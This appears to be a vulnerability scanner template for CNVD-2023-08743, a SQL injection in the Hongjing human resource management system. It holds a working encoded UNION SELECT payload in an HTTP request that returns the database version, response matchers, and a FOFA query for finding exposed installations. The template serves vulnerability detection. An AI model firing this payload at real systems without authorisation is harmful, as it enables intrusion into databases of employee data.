## id: CNVD-2023-08743
## name: Hongjing Human Resource Management System - SQL Injection
## author: hack007x
## severity: critical
## tags: cnvd2023,cnvd,hongjing,hcm,sqli,vuln
## description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.
## reference: https://www.henry4e36.top/index.php/archives/162.html
## reference: https://blog.csdn.net/qq_41904294/article/details/130944159
## fofa-query: title="人力资源信息管理系统"
## verification: true

GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["content-type"] contains "text/xml"
#@ matcher: body contains 'TreeNode id="hongjing"' && body contains "SQL Server"





# @VEIL-STAMP: 522ac1aa67f4dc79e858d21c070dc626fdf67701ed7390ac6a293c6a923b27c6
